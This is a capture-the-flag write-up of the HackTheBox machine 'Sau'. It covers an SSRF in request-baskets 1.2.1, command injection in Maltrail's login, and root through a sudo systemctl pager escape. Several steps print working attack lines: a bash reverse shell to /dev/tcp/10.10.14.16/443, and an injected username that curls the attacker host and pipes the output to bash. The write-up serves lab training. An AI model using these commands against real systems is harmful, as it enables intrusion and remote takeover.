Sau

#Linux #SSRF #Sudo

Academy is an easy-rated Linux machine from HackTheBox, created by sau123. In the current post, my IP is 10.10.14.16, and the target IP is 10.10.11.224

This machine is quite linear. After the reconnaissance phase upon entering the website, you can see what it is and its version. After some investigation you find an easily executable SSRF (Server-Side Request Forgery) vulnerability, and then discover a different site within a filtered port, where you once again search for a specific exploit to gain entry into the system. The privilege escalation is straightforward, and the steps are part of a generic privilege escalation search.

Recon

The first steps are about getting basic information about the target, by using nmap and searching information from the website.

Local Terminal
$ ping -c 1 10.10.11.224

PING 10.10.11.224 (10.10.11.224) 56(84) bytes of data.
64 bytes from 10.10.11.224: icmp_seq=1 ttl=63 time=167 ms

--- 10.10.11.224 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 166.632/166.632/166.632/0.000 ms

By the TTL, we can assume that is a Linux Machine.

Local Terminal
$ nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn -oN Ports 10.10.11.224

Nmap scan report for 10.10.11.224
Host is up, received user-set (0.17s latency).
Scanned at 2023-07-17 11:09:07 -04 for 16s
Not shown: 65531 closed ports, 2 filtered ports
Reason: 65531 resets and 2 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack ttl 62
55555/tcp open  unknown syn-ack ttl 62

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 16.01 seconds
           Raw packets sent: 77813 (3.424MB) | Rcvd: 77038 (3.082MB)
Local Terminal
$ nmap -sCV -p 22,55555 10.10.11.224 -oN Target

Nmap scan report for 10.10.11.224
Host is up (0.17s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
55555/tcp open  unknown
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
<...>

From both scans there is nothing relevant, but if you go to "http://10.10.11.224:55555" you will find a request-baskets site with version 1.2.1

If you search for "request-baskets version 1.2.1 exploit" you will find an SSRF exploit.

https://gist.github.com/b33t1e/3079c10c88cad379fb166c389ce3b7b3

Create and open a basket, remember it's name.

From the exploit we need and specific configuration, follow the instructions.

Reverse Shell [Puma]

Now go with your browser, http://10.10.11.224:55555/4wjs085, it's using Mailtrail, if you search about it, you will find an exploit at the login page, so now we need to change the configuration and send a POST request with curl.

Now we need 3 terminals, one to prepare the http.server with a reverse shell, another one listening, and the third one to execute the exploit.

Local Terminal A
vi index.html
#!/bin/bash

bash -i >& /dev/tcp/10.10.14.16/443 0>&1
Local Terminal A
python3 -m http.server 80
Local Terminal B
nc -nlvp 443
Local Terminal C
curl 'http://10.10.11.224:55555/4wjs085' --data 'username=;`curl 10.10.14.16|bash`'

And now your local terminal C is the target "puma", remember to do a TTY Upgrade

Target Terminal [puma]
cat /home/puma/user.txt

Privileges Escalation

Target Terminal [puma]
puma@sau:/opt/maltrail$ id
id
uid=1001(puma) gid=1001(puma) groups=1001(puma)

puma@sau:/opt/maltrail$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

NOPASSWD to trail.service, let's what we can do with it.

Target Terminal [puma]
$ sudo /usr/bin/systemctl status trail.service

$ !sh
Target Terminal [root]
$ whoami
whoami
root

$ cat /root/root.txt
cat /root/root.txt

Done!

PreviousMonitorsTwoNextTopology

Last updated